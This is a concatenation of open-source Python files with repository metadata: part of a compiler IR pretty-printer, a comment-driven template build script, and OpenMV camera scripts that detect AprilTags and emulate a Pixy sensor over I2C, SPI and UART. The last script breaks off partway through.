self.binary('IAdd', node)
def Pass(self, node):
self.write('Pass')
def Init(self, node):
self.write('Init ')
self.visit(node.type)
def Argument(self, node):
self.write(node.name.name)
self.anno(node)
def Assign(self, node):
self.visit(node.left)
self.write(' = ')
self.visit(node.right)
def Call(self, node):
self.visit(node.name)
self.write('(')
for i, arg in enumerate(node.args):
self.visit(arg)
if i < len(node.args) - 1:
self.write(', ')
self.write(')')
self.anno(node)
if node.callbr is not None:
self.write(' => %s, %s' % node.callbr)
def Return(self, node):
self.write('Return')
if node.value is not None:
self.write(' ')
self.visit(node.value)
def Yield(self, node):
self.write('Yield')
if node.value is not None:
self.write(' ')
self.visit(node.value)
def Raise(self, node):
self.write('Raise ')
self.visit(node.value)
def CondBranch(self, node):
self.write('CondBranch ')
self.visit(node.cond)
self.write(' ? %s : %s' % (node.tg1, node.tg2))
def Branch(self, node):
self.write('Branch %s' % node.label)
def Attrib(self, node):
self.visit(node.obj)
self.write(' . ')
self.write(node.attrib)
self.anno(node)
def SetAttr(self, node):
self.Attrib(node)
def Elem(self, node):
self.write('Elem(')
self.visit(node.obj)
self.write(', ')
self.visit(node.key)
self.write(')')
self.anno(node)
def Phi(self, node):
self.write('Phi ')
self.write('%s:' % node.left[0])
self.visit(node.left[1])
self.write(', ')
self.write('%i:' % node.right[0])
self.visit(node.right[1])
def For(self, node):
self.visit(node.lvar)
self.write(' <- ')
self.visit(node.source)
def LPad(self, node):
self.write('LPad: %s {' % node.var)
for k, v in util.items(node.map):
self.visit(k)
self.write(': ' + str(v))
self.write('}')
def Resume(self, node):
self.write('Resume: %s' % node.var)
def LoopSetup(self, node):
self.write('LoopSetup ')
self.visit(node.loop)
def LoopHeader(self, node):
self.write('LoopHeader ctx:')
self.visit(node.ctx)
self.write(' lvar:')
self.visit(node.lvar)
self.write(' %s:%s' % (node.tg1, node.tg2))
def Free(self, node):
self.write('Free(')
self.visit(node.value)
self.write(')')
def prettify(name, flow):
pp = PrettyPrinter()
return pp.build(name, flow)
| {
"repo_name": "djc/runa",
"path": "runac/pretty.py",
"copies": "1",
"size": "5902",
"license": "mit",
"hash": 3103162756587728000,
"line_mean": 19.4221453287,
"line_max": 75,
"alpha_frac": 0.6262283972,
"autogenerated": false,
"ratio": 2.6863905325443787,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.38126189297443785,
"avg_score": null,
"num_lines": null
} |
#** apricot.R = 1 **#
def build(basefile, outfile, rs, vs, rm, e):
currentdir = os.getcwd()
tmpfile = "apricot.tmp.{}".format(e)
b = "{}/{}".format(currentdir, basefile)
t = "{}/{}".format(currentdir, tmpfile)
shutil.copy(b, t)
# outputファイルを生成
fl = open(outfile, 'w')
# メイン処理
f = open(tmpfile, 'r')
codes = f.readlines()
i = 0 # 行数
#
# 一行ずつ以下の処理を行う
#
for code in codes:
#
# remove codes の処理
#
i += 1
for ptn in rm:
ptn = ptn.split("=")[-1]
if re.match(ptn, code) is not None:
print "@{}:{} removed ({}): {}".format(tmpfile, i, ptn, code[:-1])
code = ''
#
# set Values の処理
#
cmt = "{}set ".format(apricot_comment[e][0]) # ex. "/** apricot.set "
pos = code.find(cmt)
if pos >= 0:
cmtb = " {}".format(apricot_comment[e][1]) # ex. " **/"
vlabel = code.split(cmt)[-1].split(cmtb)[0]
value = ''
for v in vs:
ptn = v.split("=")[0]
if ptn == vlabel:
value = v.split("=")[-1]
if value != '':
rep = "{}set {} {}".format(apricot_comment[e][0], vlabel, apricot_comment[e][1])
# ex. "/** apricot.set Va **/"
code = code.replace(rep, value)
print "@{}:{} setted ({}): {}".format(tmpfile, i, vlabel, value)
#
# import Resources の処理
#
cmt = "{}import ".format(apricot_comment[e][0]) # ex. "/** apricot.import "
pos = code.find(cmt)
if pos >= 0:
cmtb = " {}".format(apricot_comment[e][1]) # ex. " **/"
rstr = code.split(cmt)[-1].split(cmtb)[0]
rfile = rstr.split("/")[0]
rlabel = rstr.split("/")[-1]
value = ''
for r in rs:
ptn = r.split("=")[0]
if ptn == rlabel:
value = r.split("=")[-1]
code_a = get_code(rfile, rlabel, value, e)
rep = "{}import {}/{} {}".format(apricot_comment[e][0],
rfile,
rlabel,
apricot_comment[e][1])
if(code_a != ""):
code = code.replace(rep, code_a)
print "@{}:{} imported ({}/{}): {}".format(tmpfile, i, rfile, rlabel, value)
else:
code = "// {}".format(code)
print "@{}:{} NOT imported ({}): {}".format(tmpfile, i, rlabel, value)
#print code_a
fl.write(code)
f.close()
fl.close()
os.remove(tmpfile)
return 1
def get_code(f, l, val, e):
fl = file(f, 'r')
content = fl.read()
ptn = "{}R = ".format(apricot_comment[e][0]) # ex. "/** apricot.R = "
snippets = content.split(ptn)
q = "{} {}".format(val, apricot_comment[e][1]) # ex. "en **/"
c = ""
for snippet in snippets:
pos = snippet.find(q)
if pos == 0:
cmt = apricot_comment[e][0].split(" ")[0]
# c = "{} {}/{} = {}".format(cmt, f, l, snippet)
c = snippet.split(q)[-1]
# 改行コードを除去(win, mac, unix)
c = c.lstrip();
c = c.lstrip();
fl.close()
return c
fl.close()
return c | {
"repo_name": "daiz713/Universe",
"path": "beta/build.py",
"copies": "1",
"size": "3508",
"license": "mit",
"hash": 1000598568892304500,
"line_mean": 33.5353535354,
"line_max": 96,
"alpha_frac": 0.4148624927,
"autogenerated": false,
"ratio": 3.1736304549675025,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.40884929476675025,
"avg_score": null,
"num_lines": null
} |
# AprilTags Example
#
# This example shows the power of the OpenMV Cam to detect April Tags
# on the OpenMV Cam M7. The M4 versions cannot detect April Tags.
import sensor, image, time, math
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQVGA) # we run out of memory if the resolution is much bigger...
sensor.skip_frames(time = 2000)
sensor.set_auto_gain(False) # must turn this off to prevent image washout...
clock = time.clock()
# Note! Unlike find_qrcodes the find_apriltags method does not need lens correction on the image to work.
# The apriltag code supports up to 6 tag families which can be processed at the same time.
# Returned tag objects will have their tag family and id within the tag family.
tag_families = 0
tag_families |= image.TAG16H5 # comment out to disable this family
tag_families |= image.TAG25H7 # comment out to disable this family
tag_families |= image.TAG25H9 # comment out to disable this family
tag_families |= image.TAG36H10 # comment out to disable this family
tag_families |= image.TAG36H11 # comment out to disable this family (default family)
tag_families |= image.ARTOOLKIT # comment out to disable this family
# What's the difference between tag families? Well, for example, the TAG16H5 family is effectively
# a 4x4 square tag. So, this means it can be seen at a longer distance than a TAG36H11 tag which
# is a 6x6 square tag. However, the lower H value (H5 versus H11) means that the false positve
# rate for the 4x4 tag is much, much, much, higher than the 6x6 tag. So, unless you have a
# reason to use the other tags families just use TAG36H11 which is the default family.
def family_name(tag):
if(tag.family() == image.TAG16H5):
return "TAG16H5"
if(tag.family() == image.TAG25H7):
return "TAG25H7"
if(tag.family() == image.TAG25H9):
return "TAG25H9"
if(tag.family() == image.TAG36H10):
return "TAG36H10"
if(tag.family() == image.TAG36H11):
return "TAG36H11"
if(tag.family() == image.ARTOOLKIT):
return "ARTOOLKIT"
while(True):
clock.tick()
img = sensor.snapshot()
for tag in img.find_apriltags(families=tag_families): # defaults to TAG36H11 without "families".
img.draw_rectangle(tag.rect(), color = (255, 0, 0))
img.draw_cross(tag.cx(), tag.cy(), color = (0, 255, 0))
print_args = (family_name(tag), tag.id(), (180 * tag.rotation()) / math.pi)
print("Tag Family %s, Tag ID %d, rotation %f (degrees)" % print_args)
print(clock.fps())
| {
"repo_name": "kwagyeman/openmv",
"path": "scripts/examples/Arduino/Portenta-H7/26-April-Tags/find_apriltags.py",
"copies": "2",
"size": "2546",
"license": "mit",
"hash": 2251345702936042500,
"line_mean": 44.4642857143,
"line_max": 105,
"alpha_frac": 0.7054202671,
"autogenerated": false,
"ratio": 3.2936610608020698,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9954072905369749,
"avg_score": 0.009001684506464366,
"num_lines": 56
} |
# AprilTags Max Res Example
#
# This example shows the power of the OpenMV Cam to detect April Tags
# on the OpenMV Cam M7. The M4 versions cannot detect April Tags.
import sensor, image, time, math, omv
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.VGA) # we run out of memory if the resolution is much bigger...
# AprilTags works on a maximum of < 64K pixels.
if omv.board_type() == "H7": sensor.set_windowing((240, 240))
elif omv.board_type() == "M7": sensor.set_windowing((200, 200))
else: raise Exception("You need a more powerful OpenMV Cam to run this script")
sensor.skip_frames(time = 2000)
sensor.set_auto_gain(False) # must turn this off to prevent image washout...
clock = time.clock()
# Note! Unlike find_qrcodes the find_apriltags method does not need lens correction on the image to work.
# The apriltag code supports up to 6 tag families which can be processed at the same time.
# Returned tag objects will have their tag family and id within the tag family.
tag_families = 0
tag_families |= image.TAG16H5 # comment out to disable this family
tag_families |= image.TAG25H7 # comment out to disable this family
tag_families |= image.TAG25H9 # comment out to disable this family
tag_families |= image.TAG36H10 # comment out to disable this family
tag_families |= image.TAG36H11 # comment out to disable this family (default family)
tag_families |= image.ARTOOLKIT # comment out to disable this family
# What's the difference between tag families? Well, for example, the TAG16H5 family is effectively
# a 4x4 square tag. So, this means it can be seen at a longer distance than a TAG36H11 tag which
# is a 6x6 square tag. However, the lower H value (H5 versus H11) means that the false positve
# rate for the 4x4 tag is much, much, much, higher than the 6x6 tag. So, unless you have a
# reason to use the other tags families just use TAG36H11 which is the default family.
def family_name(tag):
if(tag.family() == image.TAG16H5):
return "TAG16H5"
if(tag.family() == image.TAG25H7):
return "TAG25H7"
if(tag.family() == image.TAG25H9):
return "TAG25H9"
if(tag.family() == image.TAG36H10):
return "TAG36H10"
if(tag.family() == image.TAG36H11):
return "TAG36H11"
if(tag.family() == image.ARTOOLKIT):
return "ARTOOLKIT"
while(True):
clock.tick()
img = sensor.snapshot()
for tag in img.find_apriltags(families=tag_families): # defaults to TAG36H11 without "families".
img.draw_rectangle(tag.rect(), color = 127)
img.draw_cross(tag.cx(), tag.cy(), color = 127)
print_args = (family_name(tag), tag.id(), (180 * tag.rotation()) / math.pi)
print("Tag Family %s, Tag ID %d, rotation %f (degrees)" % print_args)
print(clock.fps())
| {
"repo_name": "kwagyeman/openmv",
"path": "scripts/examples/Arduino/Portenta-H7/26-April-Tags/find_apriltags_max_res.py",
"copies": "2",
"size": "2795",
"license": "mit",
"hash": -6554370241799320000,
"line_mean": 45.5833333333,
"line_max": 105,
"alpha_frac": 0.7076923077,
"autogenerated": false,
"ratio": 3.2766705744431417,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49843628821431424,
"avg_score": null,
"num_lines": null
} |
# AprilTags Pixy I2C Emulation Script
#
# This script allows your OpenMV Cam to transmit AprilTag detection data like
# a Pixy (CMUcam5) tracking colors in I2C mode. This script allows you to
# easily replace a Pixy (CMUcam5) color tracking sensor with an OpenMV Cam
# AprilTag tracking sensor. Note that this only runs on the OpenMV Cam M7.
#
# P4 = SCL
# P5 = SDA
#
# P7 = Servo 1
# P8 = Servo 2
# Note: The tag family is TAG36H11. Additionally, in order to for the
# signature value of a tag detection to be compatible with pixy
# interface libraries all tag ids have 8 added to them in order
# to move them in the color code signature range. Finally, tags
# are all reported as color code blocks...
# Pixy Parameters ############################################################
max_blocks = 1000
max_blocks_per_id = 1000
i2c_address = 0x54
# Pan Servo
s0_lower_limit = 1000 # Servo pulse width lower limit in microseconds.
s0_upper_limit = 2000 # Servo pulse width upper limit in microseconds.
# Tilt Servo
s1_lower_limit = 1000 # Servo pulse width lower limit in microseconds.
s1_upper_limit = 2000 # Servo pulse width upper limit in microseconds.
analog_out_enable = False # P6 -> Analog Out (0v - 3.3v).
analog_out_mode = 0 # 0 == x position of largest tag - 1 == y position of largest tag
##############################################################################
import image, math, pyb, sensor, struct, time
# Camera Setup
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQVGA)
sensor.skip_frames(time = 2000)
# LED Setup
red_led = pyb.LED(1)
green_led = pyb.LED(2)
blue_led = pyb.LED(3)
red_led.off()
green_led.off()
blue_led.off()
# DAC Setup
dac = pyb.DAC("P6") if analog_out_enable else None
if dac:
dac.write(0)
# Servo Setup
min_s0_limit = min(s0_lower_limit, s0_upper_limit)
max_s0_limit = max(s0_lower_limit, s0_upper_limit)
min_s1_limit = min(s1_lower_limit, s1_upper_limit)
max_s1_limit = max(s1_lower_limit, s1_upper_limit)
s0_pan = pyb.Servo(1) # P7
s1_tilt = pyb.Servo(2) # P8
s0_pan.pulse_width(int((max_s0_limit - min_s0_limit) // 2)) # center
s1_tilt.pulse_width(int((max_s1_limit - min_s1_limit) // 2)) # center
s0_pan_conversion_factor = (max_s0_limit - min_s0_limit) / 1000
s1_tilt_conversion_factor = (max_s1_limit - min_s1_limit) / 1000
def s0_pan_position(value):
s0_pan.pulse_width(round(s0_lower_limit + (max(min(value, 1000), 0) * s0_pan_conversion_factor)))
def s1_tilt_position(value):
s1_tilt.pulse_width(round(s1_lower_limit + (max(min(value, 1000), 0) * s1_tilt_conversion_factor)))
# Link Setup
bus = pyb.I2C(2, pyb.I2C.SLAVE, addr = i2c_address)
def write(data):
# Prepare the data to transmit first so we can do it quickly.
out_data = []
for i in range(0, len(data), 2):
out_data.append(data[i:i+2])
# Disable interrupts so we can send all packets without gaps.
state = pyb.disable_irq()
for i in range(len(out_data)):
max_exceptions = 10
loop = True
while(loop):
try:
bus.send(out_data[i], timeout = 1)
loop = False
except OSError as error:
if(max_exceptions <= 0):
pyb.enable_irq(state)
return
max_exceptions -= 1
pyb.enable_irq(state)
def available():
return 0 # Not implemented as there is no way for the us to be ready to receive the data.
def read_byte():
return 0 # Not implemented as there is no way for the us to be ready to receive the data.
# Helper Stuff
def checksum(data):
checksum = 0
for i in range(0, len(data), 2):
checksum += ((data[i+1] & 0xFF) << 8) | ((data[i+0] & 0xFF) << 0)
return checksum & 0xFFFF
def to_object_block_format(tag):
angle = int((tag.rotation() * 180) // math.pi)
temp = struct.pack("<hhhhhh", tag.id() + 8, tag.cx(), tag.cy(), tag.w(), tag.h(), angle)
return struct.pack("<hh12s", 0xAA56, checksum(temp), temp)
# FSM Code
fsm_state = 0
last_byte = 0
FSM_STATE_NONE = 0
FSM_STATE_ZERO = 1
FSM_STATE_SERVO_CONTROL_0 = 2
FSM_STATE_SERVO_CONTROL_1 = 3
FSM_STATE_SERVO_CONTROL_2 = 4
FSM_STATE_SERVO_CONTROL_3 = 5
FSM_STATE_CAMERA_CONTROL = 6
FSM_STATE_LED_CONTROL_0 = 7
FSM_STATE_LED_CONTROL_1 = 8
FSM_STATE_LED_CONTROL_2 = 9
def parse_byte(byte):
global fsm_state
global last_byte
if fsm_state == FSM_STATE_NONE:
if byte == 0x00: fsm_state = FSM_STATE_ZERO
else: fsm_state = FSM_STATE_NONE
elif fsm_state == FSM_STATE_ZERO:
if byte == 0xFF: fsm_state = FSM_STATE_SERVO_CONTROL_0
elif byte == 0xFE: fsm_state = FSM_STATE_CAMERA_CONTROL
elif byte == 0xFD: fsm_state = FSM_STATE_LED_CONTROL_0
else: fsm_state = FSM_STATE_NONE
elif fsm_state == FSM_STATE_SERVO_CONTROL_0:
fsm_state = FSM_STATE_SERVO_CONTROL_1
elif fsm_state == FSM_STATE_SERVO_CONTROL_1:
fsm_state = FSM_STATE_SERVO_CONTROL_2
s0_pan_position(((byte & 0xFF) << 8) | ((last_byte & 0xFF) << 0))
elif fsm_state == FSM_STATE_SERVO_CONTROL_2:
fsm_state = FSM_STATE_SERVO_CONTROL_3
elif fsm_state == FSM_STATE_SERVO_CONTROL_3:
fsm_state = FSM_STATE_NONE
s1_tilt_position(((byte & 0xFF) << 8) | ((last_byte & 0xFF) << 0))
elif fsm_state == FSM_STATE_CAMERA_CONTROL:
fsm_state = FSM_STATE_NONE
# Ignore...
elif fsm_state == FSM_STATE_LED_CONTROL_0:
fsm_state = FSM_STATE_LED_CONTROL_1
if byte & 0x80: red_led.on()
else: red_led.off()
elif fsm_state == FSM_STATE_LED_CONTROL_1:
fsm_state = FSM_STATE_LED_CONTROL_2
if byte & 0x80: green_led.on()
else: green_led.off()
elif fsm_state == FSM_STATE_LED_CONTROL_2:
fsm_state = FSM_STATE_NONE
if byte & 0x80: blue_led.on()
else: blue_led.off()
last_byte = byte
# Main Loop
clock = time.clock()
while(True):
clock.tick()
img = sensor.snapshot()
tags = img.find_apriltags() # default TAG36H11 family
# Transmit Tags #
if tags and (max_blocks > 0) and (max_blocks_per_id > 0): # new frame
dat_buf = struct.pack("<h", 0xAA55)
id_map = {}
first_b = False
for tag in sorted(tags, key = lambda x: x.area(), reverse = True)[0:max_blocks]:
if not tag.id() in id_map:
id_map[tag.id()] = 1
else:
id_map[tag.id()] += 1
if id_map[tag.id()] <= max_blocks_per_id:
dat_buf += to_object_block_format(tag)
img.draw_rectangle(tag.rect())
img.draw_cross(tag.cx(), tag.cy())
if dac and not first_b:
x_scale = 255 / (img.width()-1)
y_scale = 255 / (img.height()-1)
dac.write(round((tag.y() * y_scale) if analog_out_mode else (tag.x() * x_scale)))
first_b = True
dat_buf += struct.pack("<h", 0x0000)
write(dat_buf) # write all data in one packet...
else: # nothing found
write(struct.pack("<h", 0x0000))
if dac:
dac.write(0)
# Parse Commands #
for i in range(available()):
parse_byte(read_byte())
num_tags = min(len(tags), max_blocks)
print("%d tags(s) found - FPS %f" % (num_tags, clock.fps()))
| {
"repo_name": "kwagyeman/openmv",
"path": "scripts/examples/OpenMV/17-Pixy-Emulation/apriltags_pixy_i2c_emulation.py",
"copies": "5",
"size": "7365",
"license": "mit",
"hash": 3275424195161561600,
"line_mean": 29.0612244898,
"line_max": 103,
"alpha_frac": 0.6027155465,
"autogenerated": false,
"ratio": 2.9519038076152304,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.005781591577918909,
"num_lines": 245
} |
# AprilTags Pixy SPI Emulation Script
#
# This script allows your OpenMV Cam to transmit AprilTag detection data like
# a Pixy (CMUcam5) tracking colors in SPI mode. This script allows you to
# easily replace a Pixy (CMUcam5) color tracking sensor with an OpenMV Cam
# AprilTag tracking sensor. Note that this only runs on the OpenMV Cam M7.
#
# P0 = MOSI
# P1 = MISO
# P2 = SCLK
# P3 = SS
#
# P7 = Servo 1
# P8 = Servo 2
# Note: Please make sure your Arduino, etc. is running its SPI code before the
# OpenMV Cam starts running. Additionally, sometimes the OpenMV Cam is
# unable to sync up with the Arduino SPI data stream. Just restart your
# OpenMV Cam when this happens. The OpenMV Cam should sync up within
# 1-9 tries. Use the serial or I2C version of this script otherwise.
# Note: The tag family is TAG36H11. Additionally, in order to for the
# signature value of a tag detection to be compatible with pixy
# interface libraries all tag ids have 8 added to them in order
# to move them in the color code signature range. Finally, tags
# are all reported as color code blocks...
# Pixy Parameters ############################################################
max_blocks = 1000
max_blocks_per_id = 1000
# Pan Servo
s0_lower_limit = 1000 # Servo pulse width lower limit in microseconds.
s0_upper_limit = 2000 # Servo pulse width upper limit in microseconds.
# Tilt Servo
s1_lower_limit = 1000 # Servo pulse width lower limit in microseconds.
s1_upper_limit = 2000 # Servo pulse width upper limit in microseconds.
analog_out_enable = False # P6 -> Analog Out (0v - 3.3v).
analog_out_mode = 0 # 0 == x position of largest tag - 1 == y position of largest tag
##############################################################################
import image, math, pyb, sensor, struct, time
# Camera Setup
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQVGA)
sensor.skip_frames(time = 2000)
# LED Setup
red_led = pyb.LED(1)
green_led = pyb.LED(2)
blue_led = pyb.LED(3)
red_led.off()
green_led.off()
blue_led.off()
# DAC Setup
dac = pyb.DAC("P6") if analog_out_enable else None
if dac:
dac.write(0)
# Servo Setup
min_s0_limit = min(s0_lower_limit, s0_upper_limit)
max_s0_limit = max(s0_lower_limit, s0_upper_limit)
min_s1_limit = min(s1_lower_limit, s1_upper_limit)
max_s1_limit = max(s1_lower_limit, s1_upper_limit)
s0_pan = pyb.Servo(1) # P7
s1_tilt = pyb.Servo(2) # P8
s0_pan.pulse_width(int((max_s0_limit - min_s0_limit) // 2)) # center
s1_tilt.pulse_width(int((max_s1_limit - min_s1_limit) // 2)) # center
s0_pan_conversion_factor = (max_s0_limit - min_s0_limit) / 1000
s1_tilt_conversion_factor = (max_s1_limit - min_s1_limit) / 1000
def s0_pan_position(value):
s0_pan.pulse_width(round(s0_lower_limit + (max(min(value, 1000), 0) * s0_pan_conversion_factor)))
def s1_tilt_position(value):
s1_tilt.pulse_width(round(s1_lower_limit + (max(min(value, 1000), 0) * s1_tilt_conversion_factor)))
# Link Setup
bus = pyb.SPI(2, pyb.SPI.SLAVE, polarity = 0, phase = 0, bits = 16)
while(True):
try:
sync_bytes = bus.recv(2, timeout = 10)
if((sync_bytes[0] == 0x00) and (sync_bytes[1] == 0x5A)):
break
except OSError as error:
pass
bus.deinit()
bus.init(pyb.SPI.SLAVE, polarity = 0, phase = 0, bits = 16)
def write(data):
max_exceptions = 10
loop = True
while(loop):
try:
bus.send(data, timeout = 10)
loop = False
except OSError as error:
if(max_exceptions <= 0):
return
max_exceptions -= 1
def available():
return 0 # Not implemented as there is no way for the us to be ready to receive the data.
def read_byte():
return 0 # Not implemented as there is no way for the us to be ready to receive the data.
# Helper Stuff
def checksum(data):
checksum = 0
for i in range(0, len(data), 2):
checksum += ((data[i+1] & 0xFF) << 8) | ((data[i+0] & 0xFF) << 0)
return checksum & 0xFFFF
def to_object_block_format(tag):
angle = int((tag.rotation() * 180) // math.pi)
temp = struct.pack("<hhhhhh", tag.id() + 8, tag.cx(), tag.cy(), tag.w(), tag.h(), angle)
return struct.pack("<hh12s", 0xAA56, checksum(temp), temp)
# FSM Code
fsm_state = 0
last_byte = 0
FSM_STATE_NONE = 0
FSM_STATE_ZERO = 1
FSM_STATE_SERVO_CONTROL_0 = 2
FSM_STATE_SERVO_CONTROL_1 = 3
FSM_STATE_SERVO_CONTROL_2 = 4
FSM_STATE_SERVO_CONTROL_3 = 5
FSM_STATE_CAMERA_CONTROL = 6
FSM_STATE_LED_CONTROL_0 = 7
FSM_STATE_LED_CONTROL_1 = 8
FSM_STATE_LED_CONTROL_2 = 9
def parse_byte(byte):
global fsm_state
global last_byte
if fsm_state == FSM_STATE_NONE:
if byte == 0x00: fsm_state = FSM_STATE_ZERO
else: fsm_state = FSM_STATE_NONE
elif fsm_state == FSM_STATE_ZERO:
if byte == 0xFF: fsm_state = FSM_STATE_SERVO_CONTROL_0
elif byte == 0xFE: fsm_state = FSM_STATE_CAMERA_CONTROL
elif byte == 0xFD: fsm_state = FSM_STATE_LED_CONTROL_0
else: fsm_state = FSM_STATE_NONE
elif fsm_state == FSM_STATE_SERVO_CONTROL_0:
fsm_state = FSM_STATE_SERVO_CONTROL_1
elif fsm_state == FSM_STATE_SERVO_CONTROL_1:
fsm_state = FSM_STATE_SERVO_CONTROL_2
s0_pan_position(((byte & 0xFF) << 8) | ((last_byte & 0xFF) << 0))
elif fsm_state == FSM_STATE_SERVO_CONTROL_2:
fsm_state = FSM_STATE_SERVO_CONTROL_3
elif fsm_state == FSM_STATE_SERVO_CONTROL_3:
fsm_state = FSM_STATE_NONE
s1_tilt_position(((byte & 0xFF) << 8) | ((last_byte & 0xFF) << 0))
elif fsm_state == FSM_STATE_CAMERA_CONTROL:
fsm_state = FSM_STATE_NONE
# Ignore...
elif fsm_state == FSM_STATE_LED_CONTROL_0:
fsm_state = FSM_STATE_LED_CONTROL_1
if byte & 0x80: red_led.on()
else: red_led.off()
elif fsm_state == FSM_STATE_LED_CONTROL_1:
fsm_state = FSM_STATE_LED_CONTROL_2
if byte & 0x80: green_led.on()
else: green_led.off()
elif fsm_state == FSM_STATE_LED_CONTROL_2:
fsm_state = FSM_STATE_NONE
if byte & 0x80: blue_led.on()
else: blue_led.off()
last_byte = byte
# Main Loop
clock = time.clock()
while(True):
clock.tick()
img = sensor.snapshot()
tags = img.find_apriltags() # default TAG36H11 family
# Transmit Tags #
if tags and (max_blocks > 0) and (max_blocks_per_id > 0): # new frame
dat_buf = struct.pack("<h", 0xAA55)
id_map = {}
first_b = False
for tag in sorted(tags, key = lambda x: x.area(), reverse = True)[0:max_blocks]:
if not tag.id() in id_map:
id_map[tag.id()] = 1
else:
id_map[tag.id()] += 1
if id_map[tag.id()] <= max_blocks_per_id:
dat_buf += to_object_block_format(tag)
img.draw_rectangle(tag.rect())
img.draw_cross(tag.cx(), tag.cy())
if dac and not first_b:
x_scale = 255 / (img.width()-1)
y_scale = 255 / (img.height()-1)
dac.write(round((tag.y() * y_scale) if analog_out_mode else (tag.x() * x_scale)))
first_b = True
dat_buf += struct.pack("<h", 0x0000)
write(dat_buf) # write all data in one packet...
else: # nothing found
write(struct.pack("<h", 0x0000))
if dac:
dac.write(0)
# Parse Commands #
for i in range(available()):
parse_byte(read_byte())
num_tags = min(len(tags), max_blocks)
print("%d tags(s) found - FPS %f" % (num_tags, clock.fps()))
| {
"repo_name": "openmv/openmv",
"path": "scripts/examples/Arduino/Portenta-H7/17-Pixy-Emulation/apriltags_pixy_spi_emulation.py",
"copies": "5",
"size": "7644",
"license": "mit",
"hash": -6072259555726542000,
"line_mean": 29.2134387352,
"line_max": 103,
"alpha_frac": 0.6085818943,
"autogenerated": false,
"ratio": 2.961642774118559,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6070224668418559,
"avg_score": null,
"num_lines": null
} |
# AprilTags Pixy UART Emulation Script
#
# This script allows your OpenMV Cam to transmit AprilTag detection data like
# a Pixy (CMUcam5) tracking colors in UART mode. This script allows you to
# easily replace a Pixy (CMUcam5) color tracking sensor with an OpenMV Cam
# AprilTag tracking sensor. Note that this only runs on the OpenMV Cam M7.
#
# P4 = TXD
# P5 = RXD
#
# P7 = Servo 1
# P8 = Servo 2
# Note: The tag family is TAG36H11. Additionally, in order to for the
# signature value of a tag detection to be compatible with pixy
# interface libraries all tag ids have 8 added to them in order
# to move them in the color code signature range. Finally, tags
# are all reported as color code blocks...
# Pixy Parameters ############################################################
max_blocks = 1000
max_blocks_per_id = 1000
uart_baudrate = 19200
# Pan Servo
s0_lower_limit = 1000 # Servo pulse width lower limit in microseconds.
s0_upper_limit = 2000 # Servo pulse width upper limit in microseconds.
# Tilt Servo
s1_lower_limit = 1000 # Servo pulse width lower limit in microseconds.
s1_upper_limit = 2000 # Servo pulse width upper limit in microseconds.
analog_out_enable = False # P6 -> Analog Out (0v - 3.3v).
analog_out_mode = 0 # 0 == x position of largest tag - 1 == y position of largest tag
##############################################################################
import image, math, pyb, sensor, struct, time
# Camera Setup
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQVGA)
sensor.skip_frames(time = 2000)
# LED Setup
red_led = pyb.LED(1)
green_led = pyb.LED(2)
blue_led = pyb.LED(3)
red_led.off()
green_led.off()
blue_led.off()
# DAC Setup
dac = pyb.DAC("P6") if analog_out_enable else None
if dac:
dac.write(0)
# Servo Setup
min_s0_limit = min(s0_lower_limit, s0_upper_limit)
max_s0_limit = max(s0_lower_limit, s0_upper_limit)
min_s1_limit = min(s1_lower_limit, s1_upper_limit)
max_s1_limit = max(s1_lower_limit, s1_upper_limit)
s0_pan = pyb.Servo(1) # P7
s1_tilt = pyb.Servo(2) # P8
s0_pan.pulse_width(int((max_s0_limit - min_s0_limit) // 2)) # center
s1_tilt.pulse_width(int((max_s1_limit - min_s1_limit) // 2)) # center
s0_pan_conversion_factor = (max_s0_limit - min_s0_limit) / 1000
s1_tilt_conversion_factor = (max_s1_limit - min_s1_limit) / 1000
def s0_pan_position(value):
s0_pan.pulse_width(round(s0_lower_limit + (max(min(value, 1000), 0) * s0_pan_conversion_factor)))
def s1_tilt_position(value):
s1_tilt.pulse_width(round(s1_lower_limit + (max(min(value, 1000), 0) * s1_tilt_conversion_factor)))
# Link Setup
uart = pyb.UART(3, uart_baudrate, timeout_char = 1000)
def write(data):
uart.write(data)
def available():
return uart.any()
def read_byte():
return uart.readchar()
# Helper Stuff
def checksum(data):
checksum = 0
for i in range(0, len(data), 2):
checksum += ((data[i+1] & 0xFF) << 8) | ((data[i+0] & 0xFF) << 0)
return checksum & 0xFFFF
def to_object_block_format(tag):
angle = int((tag.rotation() * 180) // math.pi)
temp = struct.pack("<hhhhhh", tag.id() + 8, tag.cx(), tag.cy(), tag.w(), tag.h(), angle)
return struct.pack("<hh12s", 0xAA56, checksum(temp), temp)
# FSM Code
fsm_state = 0
last_byte = 0
FSM_STATE_NONE = 0
FSM_STATE_ZERO = 1
FSM_STATE_SERVO_CONTROL_0 = 2
FSM_STATE_SERVO_CONTROL_1 = 3
FSM_STATE_SERVO_CONTROL_2 = 4
FSM_STATE_SERVO_CONTROL_3 = 5
FSM_STATE_CAMERA_CONTROL = 6
FSM_STATE_LED_CONTROL_0 = 7
FSM_STATE_LED_CONTROL_1 = 8
FSM_STATE_LED_CONTROL_2 = 9
def parse_byte(byte):
global fsm_state
global last_byte
if fsm_state == FSM_STATE_NONE:
if byte == 0x00: fsm_state = FSM_STATE_ZERO
else: fsm_state = FSM_STATE_NONE
elif fsm_state == FSM_STATE_ZERO:
if byte == 0xFF: fsm_state = FSM_STATE_SERVO_CONTROL_0
elif byte == 0xFE: fsm_state = FSM_STATE_CAMERA_CONTROL
elif byte == 0xFD: fsm_state = FSM_STATE_LED_CONTROL_0
else: fsm_state = FSM_STATE_NONE
elif fsm_state == FSM_STATE_SERVO_CONTROL_0:
fsm_state = FSM_STATE_SERVO_CONTROL_1
elif fsm_state == FSM_STATE_SERVO_CONTROL_1:
